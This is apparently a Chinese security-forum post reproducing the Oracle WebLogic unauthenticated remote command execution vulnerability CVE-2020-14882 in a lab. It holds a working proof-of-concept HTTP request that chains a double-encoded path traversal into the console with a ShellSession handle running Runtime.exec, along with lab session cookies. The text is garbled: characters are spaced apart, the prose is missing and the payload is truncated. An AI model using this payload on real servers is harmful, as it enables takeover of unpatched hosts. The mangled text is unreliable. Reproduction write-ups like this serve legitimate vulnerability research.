[717] 2020-10-30_weblogic未授权命令执行漏洞(CVE-2020-14882)复现

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-16
2020-10-30_weblogic未授权命令执行漏洞(CVE-2020-14882)复现 w e b l o g i c   C V E - 2 0 2 0 - 1 4 8 8 2     b g b i n g   2 0 2 0 - 1 0 - 3 0 O r a c l e   W e b l o g i c   S e r v e r   1 0 . 3 . 6 . 0 . 0 O r a c l e   W e b l o g i c   S e r v e r   1 2 . 1 . 3 . 0 . 0 O r a c l e   W e b l o g i c   S e r v e r   1 2 . 2 . 1 . 3 . 0 O r a c l e   W e b l o g i c   S e r v e r   1 2 . 2 . 1 . 4 . 0 O r a c l e   W e b l o g i c   S e r v e r   1 4 . 1 . 1 . 0 . 0 W e b L o g i c 1 2 . 2 . 1 . 4 j a v a j d k 1 . 8 . 0 _ 2 7 1 h t t p s : / / p a n . b a i d u . c o m / s / 1 5 P L d V p 4 Y 0 s 9 C c w A k B G 1 l f Q l 4 h x j a v a j a v a   - j a r   f m w _ 1 2 . 2 . 1 . 4 . 0 _ w l s _ l i t e _ g e n e r i c . j a r
h t t p : / / 1 2 7 . 0 . 0 . 1 : 7 0 0 1 / c o n s o l e h t t p : / / i p : 7 0 0 1 / c o n s o l e h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 1 4 : 7 0 0 1 / c o n s o l e p a y l o a d P o c G E T   / c o n s o l e / i m a g e s / % 2 5 2 E % 2 5 2 E % 2 5 2 F c o n s o l e . p o r t a l ? _ n f p b = t r u e & _ p a g e L a b e l = H o m e P a g e 1 & h a n d l e = c o m . t a n g o s o l . c o h e r e n c e . m v e l 2 . s h . S h e l l S e s s i o n ( % 2 2 j a v a . l a n g . R u n t i m e . g e t R u n t i m e ( ) . e x e c ( % 2 7 c a l c . e x e % H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 5 6 . 1 : 7 0 0 1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 ;   r v : 8 2 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 8 2 . 0 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , * / * ; q = 0 . 8 A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 8 , z h - T W ; q = 0 . 7 , z h - H K ; q = 0 . 5 , e n - U S ; q = 0 . 3 , e n ; q = 0 . 2 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   c l o s e C o o k i e :   A D M I N C O N S O L E S E S S I O N = o z 9 z j - p Q 0 R S 3 h _ Z 2 Z Z - H P U v S 8 f 4 B a l _ y k F A 3 p c g _ v J L B g w B P 2 b P 1 ! 2 1 4 5 6 9 7 3 8 8 ;   w p - s e t t i n g s - t i m e - 1 = 1 6 0 1 9 5 9 7 9 2 ;   J S E S S I O N I D = i e d z d 4 - y 3 4 X m g c 9 W s 4 J P 8 N i W d b U D m r t 3 B b D S Y 9 M K X 1 h O m V a P 6 J Y C ! 2 1 4 5 6 9 7 3 8 8 U p g r a d e - I n s e c u r e - R e q u e s t s :   1
h a c k b a r g e t p a y l o a d c o o k i e
w e b l o g i c   W e b L o g i c O r a c l e a p p l i c a t i o n   s e r v e r J A V A E E W e b L o g i c W e b J a v a J a v a J a v a   E n t e r p r i s e W e b L o g i c O r a c l e B E A J a v a J 2 E E a p p l i c a t i o n   s e r v e r J 2 E E ,   1 2 c ( 1 2 . 2 . 1 . 4 )   W e b L o g i c   P o r t a l W e b L o g i c   I n t e g r a t i o n O r a c l e F u s i o n   M i d d l e w a r e W e b L o g i c   S e r v e r O E P E ( O r a c l e   E n t e r p r i s e   P a c k f o r   E c l i p s e )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则